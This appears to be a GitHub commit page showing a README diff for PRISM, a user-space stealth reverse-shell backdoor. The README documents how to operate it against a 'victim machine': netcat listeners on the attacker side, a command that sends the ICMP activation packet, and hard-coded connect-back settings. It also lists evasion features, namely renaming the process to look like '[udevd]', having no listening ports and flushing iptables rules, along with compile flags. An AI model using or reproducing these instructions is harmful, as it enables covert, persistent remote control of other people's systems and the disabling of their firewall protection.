-
Notifications
You must be signed in to change notification settings - Fork 166
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
11bf101
commit 1e203fd
Showing
1 changed file
with
102 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,4 +1,103 @@ | ||
| prism | ||
| ===== | ||
| # Prism | ||
|
|
||
| PRISM is an user space reverse shell backdoor, written in pure C. | ||
| PRISM is an user space stealth reverse shell backdoor. | ||
|
|
||
| It was fully tested on: | ||
|
|
||
| * **Linux** | ||
| * **Solaris** | ||
| * **AIX** | ||
| * **BSD/Mac** | ||
| * **Android** | ||
|
|
||
| PRISM can works in two different ways: **ICMP** and **STATIC** mode. | ||
|
|
||
| ## ICMP mode: | ||
|
|
||
| Using this operation mode the backdoor waits silently in background for a specific ICMP packet | ||
| containing the host/port to connect back and a private key to prevent third party access. | ||
|
|
||
| * First, run **netcat** on the attacker machine to wait for incoming connection from the backdoor: | ||
| ```bash | ||
| $ nc -l -p 6666 | ||
| ``` | ||
|
|
||
| * Using the **sendPacket.py** script (or another packet builder) send the activation packet to the backdoor: | ||
| ```bash | ||
| ./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666 | ||
| ``` | ||
| **192.168.0.1** is the victim machine running prism backdoor | ||
| **p4ssw0rd** is the key | ||
| **192.168.0.10** is the attacker machine address | ||
| **6666** is the attacker machine port | ||
|
|
||
| * The backdoor will connect back to netcat! | ||
|
|
||
|
|
||
| ## STATIC mode: | ||
|
|
||
| Using this operation mode the backdoor try to connects to an hard-coded IP/PORT. | ||
| In this case, run netcat listening on the hard-coded machine/port: | ||
| ```bash | ||
| $ nc -l -p [PORT] | ||
| ``` | ||
|
|
||
| ## Features: | ||
|
|
||
| * Two operating modes (ICMP and STATIC) | ||
| * Runtime process renaming | ||
| * No listening ports | ||
| * Automatic iptables rules flushing | ||
| * Written in pure C | ||
| * No library dependencies | ||
|
|
||
| ## Configuration: | ||
|
|
||
| Before building, you have to configure the backdoor editing the source code. | ||
| Following the configuration parameters description: | ||
|
|
||
| **STATIC mode:** | ||
| *REVERSE_HOST*: Machine address to connect back | ||
| *REVERSE_PORT*: Machine port to connect back | ||
| *RESPAWN_DELAY*: Time, in seconds, between each connection | ||
|
|
||
| **ICMP mode:** | ||
| *ICMP_KEY*: Key/Password to activate the backdoor | ||
|
|
||
| **Generic parameters:** | ||
| *MOTD*: Message to be printed at the backdoor connection | ||
| *SHELL*: Shell to execute | ||
| *PROCESS_NAME*: Fake process name | ||
|
|
||
| ## Building: | ||
|
|
||
| `gcc <..OPTIONS..> -Wall -s -o prism prism.c` | ||
|
|
||
| Available GCC options: | ||
| **-DDETACH** #Run the process in background | ||
| **-DSTATIC** #Enable STATIC mode (default is the ICMP mode) | ||
| **-DNORENAME** #Doesn't renames the process | ||
| **-DIPTABLES** #Try to flush all iptables rules | ||
|
|
||
| Example: | ||
| `gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c` | ||
|
|
||
| ## Cross Compiling: | ||
| TO DO | ||
|
|
||
|
|
||
| ## Backdoor building information | ||
|
|
||
| The backdoor ignore any parameter throught the command line, except the "**Inf0**" (the last char is a digit). | ||
| This option allow you to see some information about the backdoor: | ||
|
|
||
| ```bash | ||
| $ ./prism Inf0 | ||
| Version: 0.5 | ||
| Mode: icmp | ||
| Key: p455w0rD | ||
| Process name: [udevd] | ||
| Shell: /bin/sh | ||
| Detach: Yes | ||
| Flush Iptables: No | ||
| ``` |